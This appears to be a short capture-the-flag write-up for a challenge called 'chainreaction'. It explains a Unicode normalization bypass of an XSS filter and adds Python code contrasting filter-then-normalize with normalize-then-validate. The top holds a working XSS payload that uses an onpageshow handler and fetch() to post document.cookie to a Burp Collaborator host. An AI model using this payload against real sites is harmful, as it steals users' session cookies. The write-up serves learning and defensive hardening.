Tags: xss
Rating: 2.0
My XSS payload for chainreaction, using Unicode less/greater-than signs + a whitelisted event:
```
a10asd"><body onpageshow="fetch('https://xxxx.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});">
```
Why does the server decode 0xEF 0xBC 0x9E to 0x3C? Is there a specific function? Is it the default server behavior?
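One common cause of fullwidth characters turning into ASCII is Unicode compatibility normalization (NFKC/NFKD) running after the input filter. The page does not say what this server runs, so the following is an added example and not the challenge's code: the function names and the sample string are constructed, and it shows the filter-then-normalize order next to the corrected normalize-then-validate order.

```python
import html
import unicodedata

BLOCKED = set('<>"\'')

# Constructed sample: fullwidth U+FF1C / U+FF1E instead of ASCII < and >.
SAMPLE = "\uff1cb\uff1ehello"


def naive_filter(value: str) -> str:
    """Weak order: check for ASCII metacharacters, then normalize."""
    if any(ch in BLOCKED for ch in value):
        raise ValueError("blocked character")
    # Assumption: some later layer applies NFKC to the accepted value.
    return unicodedata.normalize("NFKC", value)


def hardened_filter(value: str) -> str:
    """Corrected order: normalize first, then validate the canonical form."""
    canonical = unicodedata.normalize("NFKC", value)
    if any(ch in BLOCKED for ch in canonical):
        raise ValueError("blocked character after normalization")
    return canonical


def safe_render(value: str) -> str:
    """Output encoding on the normalized value, independent of any filter."""
    return html.escape(unicodedata.normalize("NFKC", value), quote=True)


def compat_map(chars: str) -> dict:
    """UTF-8 bytes (hex) of each character -> bytes (hex) of its NFKC form."""
    return {
        ch.encode("utf-8").hex(): unicodedata.normalize("NFKC", ch).encode("utf-8").hex()
        for ch in chars
    }


if __name__ == "__main__":
    print(compat_map("\uff1c\uff1e\uff02"))
    print("naive   :", naive_filter(SAMPLE))
    print("rendered:", safe_render(SAMPLE))
    try:
        hardened_filter(SAMPLE)
    except ValueError as exc:
        print("hardened:", exc)
```

To find where this happens in a real stack, look for explicit NFKC/NFKD calls, database collations, and charset conversions that sit between the validation step and the HTML output.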